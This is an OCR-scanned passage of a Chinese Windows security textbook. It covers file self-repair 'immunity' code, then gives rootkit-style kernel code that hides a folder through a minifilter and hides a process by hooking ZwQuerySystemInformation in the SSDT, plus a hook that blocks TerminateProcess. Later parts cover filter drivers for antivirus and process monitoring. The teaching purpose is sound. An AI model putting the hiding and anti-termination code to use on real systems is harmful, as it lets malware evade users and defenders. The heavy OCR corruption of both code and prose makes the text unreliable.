被 修改 过 的 和 还 原 后 的 程序 ， 从 图 3-30 和 图 3-31 看 出 ， 免 疫 代码 能 检测 到 自己 已 经 被 修 
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改 ， kin “确定 ”按钮 后 ， 程 序 被 恢复 ， 说 明 被 修改 后 可 以 自我 还 原 。 
运行 被 修改 的 3DFRAMES.EXE 后 , 再 用 VC++ 以 二 进 制 方式 打开 文件 , 结果 如 图 3-31 
所 示 ， 被 修改 的 地 方 已 经 恢复 原来 的 值 。 


加 过 免疫 代码 后 ， 程 序 运行 前 先 显示 信息 框 ， 如 图 3-28 所 示 。 


E লগা _2011 年 8 月 


操作 提示 | 
第 1 节 文 件 偏 移 为 1a00H. 内 存 偏 移 3000H 

第 1 节 实 际 大 小 为 534H. 占 用 600H, 裤 白 区 ccH 字 节 
第 2 节 节 名 为 .data 
E 属性 为 c0000040H 


节 文 件 偏 移 为 2000H. 内 存 偏 移 4000H 
rr Sa 占用 200H, 空 白 区 le1lH 字 节 _ 


第 0 节 插 入 随机 数据 成 功 
[A রি ররর জজ 


图 3-27 对 文件 加 免疫 代码 


谢谢 使 用 免疫 代码 程序 XI EE x] 
已 经 被 加 过 免疫 代 


B 值 不 相等 ， 
程序 设计 : 升 关 经 食管 将 学 院 次 讯 和 起 笃 升 | ৯৮52 


[ WE | 
图 3-28 ”加 过 免疫 代码 后 的 程序 图 3-29 修改 后 运行 
创 天 中 文 VC++ 


- [3DFRAMES.EXE] 

মুত mem 查看 mA 工程 编译 TR orver3udo BO mm 
jals mg: o m Ə- DAE [ওগো 
(原来 为 00， AS a 


0000e8 
0000F0 
000100 
000110 
000120 
9000130 
000158 


图 3-30 手工 修改 


[3DFRAMES.EXE] 


图 3-31 恢复 原来 状态 
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35 恶意 程序 


恶意 程序 经 常 表现 在 文件 的 隐藏 和 进程 的 隐藏 。 两 种 隐藏 通常 可 以 简单 地 使 用 驱动 层 
API 的 HOOK 和 应 用 层 API 的 HOOK 实现 。 


3.5.4 ”驱动 层 实现 文件 隐藏 


文件 系统 驱动 程序 是 存储 管理 子 系统 的 一 个 组 件 ， 为 用 户 提供 在 持久 性 介质 上 存储 和 
读 取信 息 的 功能 ， 可 以 创建 、 修 改 和 删除 文件 ， 同 时 可 以 安全 可 控 地 在 用 户 之 间 共 享 和 传 
输 信息 ， 并 以 适当 的 方式 向 应 用 程序 提供 结构 化 的 文件 内 容 。 用 户 应 用 程序 对 磁盘 上 的 文 
件 进行 的 各 种 操作 ， 如 创建 、 打 开 、 关 闭 、 读 数据 、 写 操作 等 ， 最 终 都 要 借助 文件 系统 驱 
动 才能 完成 。 各 种 操作 调用 Kernel32. dll, 通过 Win32 子 系统 调用 Native API 向 内 核 层 传 
送 请 求 ， 然 后 通过 系统 服务 函数 将 上 层 的 请 求 传递 给 VO 管理 器 ， 在 VO 管理 器 中 ， 将 对 
磁盘 文件 的 各 种 操作 请 求 都 统一 为 输入 输出 请 求 包 IRP， 然 后 向 下 层 传送 IRP 给 文件 系统 
驱动 ， 最 终 由 文件 系统 驱动 调用 磁盘 及 其 他 存储 设备 驱动 ， 进 而 完成 对 物理 存储 设备 的 各 
种 操作 。 

本 节 实 现 一 个 文件 夹 的 隐藏 ， 完 整 的 程序 见 “XP 下 隐藏 invisible 的 文件 夹 ”。 其 原 
理 是 在 例 程 RP_MJ_DIRECTORY_CONTROL 中 检查 有 无 要 隐藏 的 文件 名 的 节点 ， 如 果 
有 ， 则 处 理 。 在 IRP 返回 时 执行 的 完成 例 程 中 可 以 对 特定 文件 实现 隐藏 。 当 用 户 在 操作 系 
统 应 用 层 查看 文件 时 ， 每 个 文件 返回 一 个 FILE BOTH _DIR_INFORMATION 的 结构 ， 该 
结构 用 来 描述 指定 目录 的 详细 信息 。 用 户 打开 的 目录 中 所 有 文件 返回 信息 形成 一 个 
FILE BOT H DIR INFORMA TION 结构 的 链表 ， 只 要 遍历 这 样 的 链表 ， 就 可 以 获取 当前 
目录 下 的 所 有 文件 信息 ， 进 而 显示 到 用 户 层 供用 户 查 看 。 只 要 从 链表 中 删除 指定 文件 对 应 
的 节点 ， 指 定 的 文件 就 会 被 隐藏 。 使 用 链表 操作 中 对 指定 节点 进行 删除 的 算法 ， 删 除 指定 
文件 对 应 的 节点 , 则 可 以 实现 文件 隐藏 。 当 然 ,还 可 以 HOOK 内 核 函数 ZwQueryDirectoryFile 
实现 文件 的 隐藏 。 

下 面 的 例子 是 在 minifilter 中 实现 的 。 请 注意 看 注释 。 


PWCHAR prefixName = L'invisible": /要 隐藏 的 文件 名 
CONST চা. OPERATION REGISTRATION Callbacks[] = 
í 
{IRP MI DIRECTORY CONTROL. 
0. 
NULL. 
MjDirectoryControlPostOperation /在 后 处 理 函数 中 处 理 
* 
(IRP MJ OPERATION END ) 
s; 
/下 面 是 遇 到 要 隐藏 文件 夹 的 处 理 函 数 
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FLT POSTOP CALLBACK STATUS MjDirectoryControlPostOperation ( — inout 
PFLT CALLBACK DATA Data, inPCFLT RELATED OBJECTS FltObjects, 
. in opt PVOID CompletionContext in FLT POST OPERATION FLAGS 
Flags ) 
£ 

ULONG length; 

ULONG nextOffset = 0: 

ULONG previousEntryWasDeleted = 0; 

PCHAR queryBuffer = 0: 

int modified = 0; 

int removedAllEntries = 1; 


PFILE BOTH DIR INFORMATION currentFileInfo = 0: 
PFILE BOTH DIR INFORMATION nextFileInfo = 0: 
PFILE BOTH DIR INFORMATION previousFileInfo — 0: 
UNICODE STRING fileName: 
UNREFERENCED PARAMETER( FltObjects ); 
UNREFERENCED PARAMETER( CompletionContext ); 
if FlagOn( Flags, FLTFL POST OPERATION DRAINING ) ) 
{ 

retum FLT POSTOP FINISHED PROCESSING: 
) 
/是 查询 文件 夹 才 处 理 
这 Data->Iopb->MinorFunction = IRP MN QUERY DIRECTORY && Data->Iopb-> 


Parameters. DirectoryControl.QueryDirectory.FileInformationClass = FileBothDirectoryInformation 


&& 
Data->Iopb->Parameters.DirectoryControl.QueryDirectory.Length > 0 && 
NT_SUCCESS(Data->IoStatus.Status) ) 


currentFileInfo 


(PFILE BOTH DIR INFORMATION)Data-^Iopb--Parameters.DirectoryControl.QueryDirectory.DirectoryBuf 


fer: 


previousFileInfo = currentFileInfo: 
// 枚 举 下 面 的 每 个 节点 ， 遇 到 则 删除 
do 
t 
nextOffset = currentFileInfo->NextEntryOffset: 
nextFileInfo = (PFILE BOTH DIR INFORMATION) 
((PCHAR )(currentFileInfo) + nextOffset): 
/ hasPrefix 比较 当前 节点 是 否 和 要 隐藏 的 文件 夹 名 相同 ， 相 同 则 返回 TRUE 
这 hasPrefix( currentFileInfo->FileName. currentFileInfo->FileNameLength ) ) 
í 
这 nextOffset = 0 ) 
{ 
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previousFileInfo->NextEntryOffset = 0: 
) 
else 
í 
previousFileInfo-^NextEntryOffset = (ULONG)((PCHAR)currentFileInfo 
- (PCHAB)previousFileInfo) + nextOffset: 
) 
modified = 1: 
previousEntry WasDeleted = 1; 
} 
else í 
removedAllEntries = 0; 
这 !previousEntryWasDeleted ) 
{ 
previousFileInfo = currentFileInfo; 
} 
previousEntryWasDeleted = 0: 
) 
currentFileInfo = nextFileInfo: 
) while( nextOffset !— 0 ): 


if( modified ) 
£ 
这 removedAllEntries ) 


{ 
Data->IoStatus.Status = STATUS NO MORE FILES: 


FltSetCallbackDataDirty( Data ): 


) 

retum FLT POSTOP FINISHED PROCESSING: 
) 
/比较 字符 串 函数 
BOOLEAN hasPrefix( PWCHAR name. ULONG length ) 
t 

ULONG i: 

ULONG wcharLength = length / 2: 

if( wcharLength < prefixLength ) 

t 

return FALSE: 
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for( i=0; i<prefixLength: i+ ) 
í 
if( name[i] != prefixName[i] ) 
return FALSE; 
) 
return TRUE: 


) 
生成 的 程序 如 图 3-32 所 示 。 文 件 hidefile sys 是 驱动 文件 ，hidefile ,inf 是 安装 文件 ， 
startbat 是 启动 驱动 服务 的 文件 。 运 行 驱动 后 ， 会 发 现 文件 夹 隐藏 不 见 了 (要 刷新 当前 资源 
管理 器 )。 


CEN m EAE 
Eelose.bat | MS-DOS 批 处 理 文件 2012-3-14 21:19 
辐 nidefile. inf ”安装 信息 2012-3-14 21:18 
国 hidefile. sys ”系统 文件 2012-3-14 21:18 
图 start.bat MS-DOS 批 处 理 文件 2012-3-14 21:19 

图 3-32 ”生成 的 程序 


3.5.2 ”隐藏 进程 


Windows 调度 的 是 线程 ， 所 以 可 以 把 要 隐藏 的 进程 从 进程 链 中 去 掉 ， 并 不 影响 进程 中 
的 线程 的 调度 和 运行 。 通 常 查询 进程 是 通过 内 核 函 数 ZwQuerySystemInformation 实现 ， 如 
果 在 驱动 中 HOOK 内 核 函 数 ， 当 遇 到 要 隐藏 的 进程 名 ,把 它 从 链表 中 去 掉 ， 就 达到 了 隐藏 
的 目的 。 

下 面 的 驱动 代码 建议 一 个 同样 的 函数 NewZwQuerySystemInformation LA HOOK 住 函 数 
ZwQuerySystemInformation， 用 来 隐藏 进程 iexplore.exe。 如 图 3-33 所 示 的 是 演示 进程 隐藏 
后 的 效果 ， 完 整 的 程序 见 “hideprocess”。 

° O 926 Pe km © @- à 


10150) [B] ttp: //vwe. 2246. con m2 


文 作 SAO EBV XUV END 
1 তা 


৪৪৪৪৭৪৪8৪৪৪ ৪8588888888] 9 


Xie Em 


图 3-33 ”隐藏 效果 演示 
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#include "ntddk.h" 
#pragma pack(1) 
typedef struct ServiceDescriptorEntry í 
unsigned int *ServiceTableBase: 
unsigned int *ServiceCounterTableBase: //Used only in checked build 
unsigned int NumberOfServices: 
unsigned char *ParamTableBase: 
) ServiceDescriptorTableEntry t, *PServiceDescriptorTableEntry t: 
fipragma pack() 
. declspec(dllimport) ServiceDescriptorTableEntry t KeServiceDescriptorTable: 
sidefine SYSTEMSERVICE( function) 
KeServiceDescriptorTable.ServiceTableBase[ /PULONG)((PUCHAR) function*1)] 
PMDL g pmdlSystemCall: 
PVOID *MappedSystemCallTable: 
fidefine SYSCALL INDEX( Function) 'PULONG)(PUCHAR) Function*1) 
#define HOOK SYSCALL( Function, Hook, Orig) ' 
Orig = (PVOID) InterlockedExchange( (PLONG) &MappedSystemCallTable 
[SYSCALL INDEX( Function)], (LONG) Hook) 


fidefine UNHOOK SYSCALL( Function, Hook, Orig) À 
InterlockedExchange( (PLONG) 
&MappedSystemCallTable[SYSCALL INDEX( Function)]. (LONG) Hook) 
struct. SYSTEM THREADS 
{ 


LARGE INTEGER KemelTime: 
LARGE INTEGER UserTime; 

LARGE INTEGER CreateTime; 
ULONG WaitTime: 
PVOID StartAddress; 
CLIENT ID Clientls: 
KPRIORITY Priority: 
KPRIORITY BasePriority: 
ULONG ContextSwitchCount; 
ULONG ThreadState; 
KWAIT REASON WaitReason; 


J: 
struct SYSTEM PROCESSES 
í 


ULONG NextEntryDelta; 
ULONG ThreadCount: 
ULONG Reserved[6]: 
LARGE INTEGER CreateTime: 

LARGE INTEGER UserTime: 


LARGE INTEGER KemelTime: 
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UNICODE STRING ProcessName: 

KPRIORITY BasePriority: 

ULONG ProcessId: 

ULONG InheritedFromProcessId: 
ULONG HandleCount; 

ULONG Reserved2[2]: 

VM COUNTERS VmCounters; 

IO COUNTERS ToCounters; //windows 2000 only 
struct SYSTEM THREADS Threads[1]: 


// Added by Creative of rootkit.com 
struct. SYSTEM PROCESSOR TIMES 
t 


LARGE INTEGER IdleTime: 
LARGE INTEGER KemelTime; 
LARGE INTEGER UserTime; 
LARGE INTEGER DpcTime: 
LARGE INTEGER InterruptTime; 
ULONG InterruptCount; 
1 
NTSYSAPI 
NTSTATUS 
NTAPI ZwQuerySystemInformation( 
IN ULONG SystemInformationClass, 
IN PVOID SystemInformation, 
IN ULONG SystemInformationLength, 
OUT PULONG ReturnLength): 


typedef NTSTATUS (*ZWQUERYSYSTEMINFORMATION)( 
ULONG SystemInformationCLass, 
PVOID SystemInformation, 
ULONG SystemlnformationLength, 
PULONG RetumLength 


ZWQUERYSYSTEMINFORMATION OldZwQuerySystemlInformation: 
// Added by Creative of rootkit.com 

LARGE INTEGER m UserTime: 

LARGE INTEGER m 7000617110৩: 


NTSTATUS NewZwQuerySystemInformation( 
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IN ULONG SystemInformationClass, 
IN PVOID SystemInformation, 

IN ULONG SystemInformationLength. 
OUT PULONG ReturnLength) 


NTSTATUS ntStatus; 
ntStatus = ((ZWQUERYSYSTEMINFORMATION)(OldZwQuerySystemInformation)) ( 


SystemInformationClass, 
SystemInformation. 
SystemInformationLength, 
ReturnLength ); 


if( NT SUCCESS(ntStatus)) 


í 


// Asking for a file and directory listing 
if(SystemInformationClass — 5) 


{ 


struct SYSTEM PROCESSES *curr = (struct SYSTEM PROCESSES 
*)SystemInformation; 
struct SYSTEM PROCESSES *prev = NULL: 


while(curr) 
í 


if (curr->ProcessName.Buffer != NULL) 
{ /在 此 比较 是 否 为 要 隐藏 的 进程 
这 0 一 memcmp(curr->ProcessName.Buffer, L"iexplore.exe", 24)) 


( 


m UserTime.QuadPart += curr-»UserTime.QuadPart; 
m KemelTime.QuadPart += curr-^»KernelTime.QuadPart; 
if(prev) // Middle or Last entry 
£ 
if(curr->NextEntryDelta) 
prev->NextEntryDelta += curr->NextEntryDelta: 
else // we are last, so make prev the end 
prev-»NextEntryDelta = 0: 


else 


if(curr-^NextEntryDelta) 
t 
(char *)SystemInformation += curr->NextEntryDelta: 
) 
else // we are the only process! 
SystemInformation = NULL: 
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) 
else // This is the entry for the Idle process 


t 
curr->UserTime.QuadPart += m UserTime.QuadPart: 
cun->KemelTime.QuadPart + m KernelTime.QuadPart: 
m UserTime.QuadPart =m KernelTime.QuadPart = 0: 
) 
prev = curr; 
if(curr-»NextEntryDelta) ((char *)curr += curr->NextEntryDelta); 
else cur = NULL: 


) 
else if (SystemInformationClass — 8) // Query for SystemProcessorTimes 


{ 
struct. SYSTEM PROCESSOR TIMES * times = (struct 


. SYSTEM PROCESSOR TIMES *)SystemInformation: 
times-»IdleTime.QuadPart +=m UserTime.QuadPart +m KernelTime.QuadPart; 
} 

} 
return ntStatus; 

} 

VOID OnUnload(IN PDRIVER_OBJECT DriverObject) 

{ 
// unhook system calls 
UNHOOK SYSCALL( ZwQuerySystemInformation, OldZwQuerySystemInformation, 
NewZwQuerySystemlInformation ); 


// Unlock and Free MDL 
if(g pmdlSystemCall) 


t 
MmUnmapLockedPages(MappedSystemCallTable, g pmdlSystemCall): 


IoFreeMdl(g pmdlSystemCall): 


} 
NTSTATUS DriverEntry(IN PDRIVER_OBJECT theDriverObject, 


IN PUNICODE STRING theRegistryPath) 


theDriverObject->DriverUnload = OnUnload: 
m UserTime.QuadPart =m KernelTime.QuadPart = 0: 
OldZwQuerySystemInformation =(ZWQUERYSYSTEMINFORMATION) 
(SYSTEMSERVICE(ZwQuerySystemInformation)): 

g pmdlSystemCall = MmCreateMdI(NULL. 
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KeServiceDescriptorTable.ServiceTableBase, KeServiceDescriptorTable.NumberOfServices*4): 
1015 pmdlSystemCall) 
return STATUS UNSUCCESSFUL: 
MmBuildMdlForNonPagedPool(g pmdlSystemCall): 
g pmdiSystemCall--MdlFlags = g pmdiSystemCall--MdlFlags | 
MDL MAPPED TO SYSTEM VA: 
MappedSystemCallTable = MmMapLockedPages(g pmdlSystemCall, KernelMode): 
// hook system calls 
HOOK SYSCALL( ZwQuerySystemInformation, NewZwQuerySystemInformation, 
OldZwQuerySystemlInformation ); 
retum STATUS SUCCESS: 
3 


3.5.8 不 能 删除 进程 


当 计 算 机 感染 某 种 病毒 后 ， 经 常 可 见 到 不 能 删除 的 病毒 进程 。 某 些 杀 毒 软 件 的 进程 也 
不 能 被 删除 。 本 节 模 拟 这 个 功能 ， 禁 止 删除 一 个 指定 的 进程 。 设 禁止 删除 的 进程 是 “禁止 
拷贝 HOOK.exe”。 该 程序 把 自己 进程 的 人 D 传 给 HOOK,HOOK DLL 将 函数 TerminateProcess 
勾 住 ， 因 为 该 函数 的 输入 参数 是 要 被 终止 进程 的 句柄 ， 以 句柄 获取 该 进程 的 ID， 然 后 拿 此 
ID 和 “禁止 拷贝 HOOK.exe” 传 入 的 ID 进行 比较 ， 如 果 相 等 ， 则 禁止 终止 。 完 整 的 程序 
见 “禁止 终止 进程 ”， 演 示 结 果 如 图 3-34 所 示 ， 具 体 步骤 如 下 : 


EE TI 


TR) mO) SG য়) WQ 


| 应 用 程序 | AE [e ea [用 户 ] 


映像 名 称 用 户 名 
QQExternal exe Administrator 
| zT Administrator 
| 5 Adni tı 
| e MAI itor 


回 显示 所 有 用 户 的 进程 ©) 


图 3-34 禁止 终止 进程 
(1) 将 受 保护 进程 的 ID 传 给 HOOK 程序 。 


typedef void (*InstallHook)(DWORD Id): 

typedef void (*UninstallHook)0: 

void C 禁止 拷贝 HOOKDIg::OnBnClickedButtonl () 
{ 

InstallHook pInstallHook: 
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HMODULE hdll lib =::LoadLibraryEx("Hook.dll".NULL.0): 
ifthdll lib 一 0){ 
MessageBox(" Wr"); 
return: 
) 
plnstallHook=(InstallHook)GetProcAddress(hdll_lib. "InstallHook"): 
这 pInstallHook 一 0){ 
MessageBox(" 失 败 2"); 
return; 
) 
DWORD id=GetCurrentProcessIdO; 
pInstallHook(id): / 传 入 受 保护 进程 的 id 
FreeLibrary(hdll lib): 
) 


(2) HOOK 的 DLL 获取 受 保护 进程 DD。 
#pragma data seg — ("shareddata") 
DWORDhld-0; /共享 数据 

#pragma data seg() 


void InstallHook(DWORD h) 
{ 
这 g_ hHook = NULL) { 
g hHook = SetWindowsHookEx( WH SHELL, MyShellProc .(HINSTANCE)g_hlnst. 0): 
) 
hld=h: /获取 受 保护 进程 ID 
) 


(3) 完善 HOOK 函数 TerminateProcess。 


DETOUR TRAMPOLINE(BOOL WINAPI Real TerminateProcess( 
HANDLE hProcess, 
DWORD uExitCode 
).TerminateProcess); 
BOOL WINAPI Mine TerminateProcess( 
HANDLE hProcess, 
DWORD uExitCode 
X 
wchar t pl[60]: 
DWORD id: 
id-GetProcessIDbyProcessHandle(hProcess): 
tow s((long)id.p1.60.16): 
这 id 一 hId){ 
MessageBoxW(0.L" 禁 止 结束 该 进程 ".p1.IDOK): 
return FALSE; 
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BOOL rev =Real TerminateProcess(hProcess.0): 
retum TRUE: 


3.6. 文件 过 滤 驱 动 应 用 于 防 病 毒 


文件 系统 过 滤 驱 动 是 针对 文件 系统 而 言 的 ， 属 于 内 核 模式 程序 (ring 0)， 运 行 于 操作 系 
统 的 内 核 模 式 。 应 用 程序 对 磁盘 发 出 的 操作 请 求 ， 首 先 到 达 IO 子 系统 管理 器 ， 在 进行 读 
写 磁盘 数据 的 时 候 ， 缓 存 管 理 器 会 保存 最 近 的 磁盘 存 取 记录 ， 所 以 在 接收 到 应 用 程序 读 写 
磁盘 的 操作 请 求 后 ，IO 子 系统 管理 器 会 先 检查 所 访问 的 数据 是 否 保存 在 缓存 中 ， 若 缓存 
中 有 要 访问 的 数据 ，LIO 子 系统 管理 器 会 构造 Fast VO 请 求 包 ， 从 缓存 中 直接 存 取 数据 ;如 
果 所 需 数据 不 在 缓存 中 ,LO 子 系统 管理 器 会 构造 相应 的 耻 P， 然 后 发 往 文件 系统 驱动 ， 同 
时 缓存 管理 器 会 保存 相应 的 记录 。 因 此 ， 文 件 系统 过 滤 驱 动 程序 有 两 组 接口 处 理由 VO 子 
系统 管理 器 发 送 来 的 用 户 模式 应 用 程序 操作 请 求 : 一 组 是 普通 的 处 理 IRP 的 分 发 函数 ; 另 

-组 是 Fastlo 调 函数 。 编 写 这 两 组 函数 也 是 文件 系统 过 滤 驱 动 的 主要 任务 之 一 。 以 前 常用 
的 开发 文件 过 滤 的 框架 是 DDK 下 的 SFILTER 程序 , 现在 用 得 比较 多 的 是 MINIFILTER f 
序 。MINIFILTER 大 大 简化 了 程序 员 的 操作 ， 加 载 、 卸 载 方便 。 


3.6.1 监视 进程 的 产生 


如 果 要 禁止 进程 的 产生 , 可 以 HOOK 函数 CreateProcess. 如 果 要 监视 进程 产生 的 时 间 、 
父 进程 ， 也 可 以 使 用 内 核 函 数 PsSetCreateProcessNotifyRoutine。 其 函数 原型 如 下 : 
NTSTATUS PsSetCreateProcessNotifyRoutine( 
IN PCREATE PROCESS NOTIFY ROUTINE NotifyRoutine, 
IN BOOLEAN Remove 
x 
NotifyRoutine 就 是 注册 的 回调 函数 , 当 有 进程 创建 的 时 候 ,就 会 调用 这 个 NotifyRoutine 
对 应 的 函数 ， 其 函数 定义 原型 如 下 : 
VOID (*PCREATE PROCESS NOTIFY ROUTINE) ( 
IN HANDLE ParentId, 
IN HANDLE Processld, 
IN BOOLEAN Create 
k 
Hep, Parentld 是 父 进程 DD; ProcessId 为 子 进程 DD; Create 代表 是 创建 进程 还 是 结束 
进程 ， 其 中 True 表示 创建 进程 ，False 表示 结束 进程 。 
通过 这 个 函数 ， 能 够 完成 进程 创建 和 退出 的 监控 ， 首 先 调用 PsSetCreateProcessNotify- 
Routine 注册 进程 监控 回调 函数 ， 然 后 在 回调 函数 里 面 ， 判 断 Create 参数 ， 分 别处 理 进程 
创建 和 退出 操作 。 下 面 的 程序 在 MINIFILTER 框架 基础 上 演示 进程 的 监控 建立 过 程 。 
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(1) 建立 监控 回调 函数 。 


VOID ProcessCreateMon ( HANDLE hParentId, HANDLE PId, BOOLEAN bCreate ) 
t 


PEPROCESS Eprocess,Pprocess; 
NTSTATUS status: 

HANDLE Tid; 

HANDLE myhandle; 


status = PsLookupProcessByProcessId((ULONG)Pid, &Eprocess): 
if(INT SUCCESS( status )) 
{ 
DbgPrint("PsLookupProcessByProcessId() n"); 
retum ; 
) 
status = PsLookupProcessByProcessId((ULONG)hParentId, &Pprocess): 
if(INT SUCCESS( status )) 
{ 
DbgPrint("PsLookupProcessByProcessId() n"); 
retum ; 


if ( bCreate ) 
{ 
DbgPrint(" 建 立 进 程 P:%18s%9X%9d%25s%9X\n"， 
(char *)((char *)Eprocess+ProcessNameOffset), 


Pid.PsGetCurrentThreadIdO), 
(char *)((char *)Pprocess*ProcessNameOffset), 
hParentId ); 
) 
else í 


DbegPrint(" 进 程 退 出 :%18s%9d%9d%25s%9d\n", 

(char *)((char *)Eprocess+ProcessNameOffset). 
Pid,PsGetCurrentThreadld(). 
(char *)((char *)Pprocess*ProcessNameOffset). 
hParentId 
É 

) 

) 


ProcessNameOffset 是 全 局 变量 ， 


ULONG GetProcessNameOffset() 
t 


下 面 的 函数 获取 : 


PEPROCESS curproc: 
int 工 
curproc = PsGetCurrentProcess(): 
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for(I= 0: I < 3*PAGE SIZE: i) 
{ 
这 !stmcmp( SYSNAME, (PCHAR) curproc + I, strlen(SYSNAME) )) 


return L 


Q) 建立 监控 。 
在 入 口 函数 DriverEntry 的 最 后 ， 添 加 如 下 代码 : 
ProcessNameOffset = GetProcessNameOffset(): 
status = PsSetCreateProcessNotifyRoutine(ProcessCreateMon, FALSE): 
/设置 进程 监控 
if(INT SUCCESS( status )) 
{ 
DbgPrint("PsSetCreateProcessNotifyRoutine() n"): 
return status; 
) 
(3) 在 驱动 退出 时 去 掉 监 控 。 
找到 函数 NPUnload， 添 加 如 下 代码 : 
PsSetCreateProcessNotifyRoutine(ProcessCreateMon, TRUE); 
/停止 监控 。 
(4) 安装 驱动 程序 。 
选中 文件 minifilter.inf， 右 键 选择 安装 程序 。 
(5) 启动 驱动 程序 。 
运行 cmd.exe， 然 后 运行 net start minifilter， 启 动 驱 动 。 


3.6.2 ”进程 与 驱动 共用 内 存 


如 果 某 个 应 用 程序 要 和 文件 过 滤 驱 动 交换 数据 ， 而 且 数据 量 比较 大 ， 可 以 使 用 共用 内 
存 的 方式 。 即 在 驱动 中 分 配 一 块 内 存 ， 应 用 程序 发 送 消息 给 驱动 ， 驱 动 的 返回 信息 中 将 共 
用 内 存 的 地 址 返回 给 应 用 程序 。 完 整 程序 见 “ 驱 动 通过 共享 内 存 主动 联系 应 用 程序 ”。 
其 步骤 如 下 : 
(1) 在 驱动 中 分 配 物 理 地 址 。 
函数 返回 0 则 成 功 。 这 里 分 配 AK. 内 存 。 
ULONG CreateAndMapMemory(OUT PMDL* PMemMdl.OUT PVOID* UserVa) 


t 
PMDL Mdl: 
PVOID UserVAToRetum: 
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PHYSICAL ADDRESS LowAddress: 
PHYSICAL ADDRESS HighAddress: 
SIZE T TotalBytes: 

/ 初始 化 MmaAllocatePagesForMdl 需要 的 Physical Address 
LowAddress.QuadPart = 0: 
HighAddress.QuadPart=0xFFFFFFFFFFFF; 
TotalBytes = PAGE SIZE: 

/ 分 配 AK 的 共享 缓冲 区 
Mdl=MmAllocatePagesForMdl(LowAddress. 
HighAddress, 

LowAddress, 

TotalBytes): 

if(IMdl) 

{ 

return 1; 

) 

/ 映射 共享 缓冲 区 到 用 户 地 址 空间 
UserVAToRetum = MmMapLockedPagesSpecifyCache(Mdl, 
UserMode, 
MmWriteCombined/*MmCached*/, 
NULL, 

FALSE, 

NormalPagePriority): 

if('UserVAToReturn) 

{ 

MmFreePagesFromMdl(Mdl): 
IoFreeMdl(Mdl): 

retum 2; 

) 

/ 返回 ， 得 到 MDL 和 用 户 层 的 虚拟 地 址 
*UserVa = UserVAToRetum; 

*PMemMdl = Mdl: 

return 0; 


) 


D 释放 物理 内 存 函数 。 


OID UnMapAndFreeMemory(PMDL PMdLPVOID UserVa) 
t 

这 !PMdD) 

{ retum :) 

/ 解除 映射 

MmUnmapLockedPages(UserVa.PMdl): 

/ 释放 MDL 锁定 的 物理 页 
MmrFreePagesFromMdl(PMdl): 

/ EIC MDL 
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ToFreeMdl(PMdl): 
) 


3) 定义 全 局 变量 。 
PMDL PMdI-NULL: 
PVOID UserVa=NULL: 


(4) 在 应 用 程序 与 驱动 联系 中 分 配 内 存 ， 返 回 虚 拟 地 址 给 应 用 程序 。 


NTSTATUS 
NPMiniMessage ( 
. in PVOID ConnectionCookie, 
. in bcount opt(InputBufferSize) PVOID InputBuffer, 
. in ULONG InputBufferSize, 
. Out bcount part opt(OutputBufferSize,*RetumOutputBufferLength) PVOID OutputBuffer, 
. in ULONG OutputBufferSize, 
. out PULONG ReturnOutputBufferLength 
) 


NPMINI COMMAND command; 
NTSTATUS status; 
BOOLEAN rel-FALSE: 
PCOMMAND MESSAGE  pMessage-NULL: 
PVOID ph=NULL: 
PAGED CODEO: 


UNREFERENCED PARAMETER( ConnectionCookie ): 
if (InputBuffer != NULL) í 
pMessage = (PCOMMAND MESSAGE)InputBuffer: 
switch (pMessage-»Command) í 
case 1: 
{ 
if(!UserVa){ 
if(!CreateAndMapMemory(&PMdl,&UserVa))( DbgPrin("Ok — 虚拟 地 址 
=9%Xh".UserVa): ) 
else { DbgPrint(" 分 配 内 存 Failed"): } 
} 
pMessage=(PCOMMAND MESSAGEJ)OutputBuffer: 
if(UserVa)( 
RtlZeroMemory(pMessage.sizeoff COMMAND MESSAGE)): 
pMessage--Command-l: /传递 地 址 命令 
RtlCopyMemory(pMessage--Folder.&UserVa.sizeof(UserVa)): 
// 把 虚拟 地 址 传 给 应 用 程序 
ph-MmGetSystemAddressForMdlSafe(PMdl. NormalPagePriority ): 
/获取 物理 地 址 
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RtlCopyMemory(ph.L"wy first\0\0".18): // 写 数据 到 物理 地 址 ， 传 给 应 用 程序 
DbePrint("%X..%X".ph.UserVa): 
) 
ReturnOutputBufferLength-sizeofCOMMAND MESSAGE): 
status - STATUS SUCCESS: 
break; 


) 
(5) 要 在 NTSTATUS NPMiniConnect 实现 释放 内 存 。 
这 是 必须 的 ， 否 则 换 程序 会 使 应 用 程序 再 运行 后 出 错 。 


NTSTATUS NPMiniConnect( 
. inPFLT PORT ClientPort, 
. in PVOID ServerPortCookie, 
. in bcount(SizeOfContext) PVOID ConnectionContext, 
. in ULONG SizeOfContext, 
. deref out opt PVOID *ConnectionCookie 
) 


PAGED CODE0: 
UNREFERENCED PARAMETER( ServerPortCookie ): 
UNREFERENCED PARAMETER( ConnectionContext ): 
UNREFERENCED PARAMETER( SizeOfContext): 
UNREFERENCED PARAMETER( ConnectionCookie ): 
ASSERT( gClientPort — NULL ): 
gClientPort = ClientPort; 

ScannerData.UserProcess = PsGetCurrentProcess(): 
ScannerData.ClientPort = ClientPort: 
retum STATUS SUCCESS: 


(6) 应 用 程序 读 取 驱动 传送 过 来 的 地 址 。 
HANDLE g hPort-0, completion; /全 局 


#define NPMINI NAME L"NPminifilter" 
#define NPMINI PORT NAME L'WNPMiniPort" 
/在 初始 化 函数 中 

DWORD hResult — 0: 

if(g hPort—0)( 


hResult = FilterConnectCommunicationPort( 
NPMINI PORT NAME, 
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&g hPort ): 
) 
/在 函数 中 
void CVC 驱动 测试 Dlg::OnBnClickedButton10 
{ 
DWORD bytesRetumed = 0: 
DWORD hResult = 0: 
COMMAND MESSAGE data: 
memset(&data, 0, sizeof(data)): 
data.Command-1: 
hResult—-FilterSendMessage( ”// 向 驱动 发 送信 息 
g hPort. 
&data, 
sizeof(COMMAND MESSAGE). 
&data, 
sizeofCOMMAND MESSAGE), 
&bytesReturned ): 
if(data.Command—1)( 
PVOID p-*((PVOID*)data.Folder); /提取 驱动 传送 过 来 的 内 存 指针 
CString inf. 
infFormat(L" 传 来 的 地 址 : 96X.96S".p.(wchar t*)p): / 取 驱 动 内 存 数据 
MessageBox(inf); 
/下 面 的 代码 向 共用 内 存 区 写 入 数据 
CFile fp: 
fp.Open(L"c:?Waaa".CFile::modeCreate | CFile::modeWrite): 
fp.Write((VOID*)p.16); 
fp.Close: 
// memcpy((void*)p.inf GetBuffer(0).inf. GetLength()): 
j 


3.603 ”进程 发 送信 息 给 驱动 


进程 给 驱动 发 送 控制 命令 ， 用 于 控制 驱动 的 行为 。 发 送 控制 命令 有 多 种 方法 ， 这 里 介 
